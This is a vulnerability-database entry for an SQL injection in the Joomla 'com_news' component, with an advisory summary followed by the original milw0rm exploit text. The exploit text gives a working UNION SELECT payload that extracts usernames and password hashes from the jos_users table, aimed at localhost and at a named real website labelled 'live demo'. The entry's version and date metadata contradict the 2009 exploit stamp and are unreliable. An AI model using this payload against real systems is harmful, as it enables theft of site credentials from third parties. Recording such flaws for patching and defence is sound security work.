Joomla Component news SQL Injection Vulnerability

vendor:

Component news

by:

Snakespc

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Component news

Affected Version From: 3.9.14

Affected Version To: 3.9.14

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component news SQL Injection Vulnerability

The vulnerability exists due to insufficient filtration of user-supplied data passed to the 'id' parameter in 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit latent vulnerabilities in the underlying database and compromise the system.

Mitigation:

Update to version 3.9.15 or later.

Source

Exploit-DB raw data:

==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	                    Joomla Component news SQL Injection Vulnerability                            +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: snakespc@gmail.com:::::::             
                =                                                                                    =                                                                                   =
                =                               "com_news"                                           =
                  ===================================GAZA=============================================

Exploit:
http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
********
Live demo:
http://www.fermaten.dk/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N:::
ALL www.Snakespc.com/SC >>>> Members 
Str0ke ....Milw0rm
==================================================================GAZA============================================================

# milw0rm.com [2009-01-19]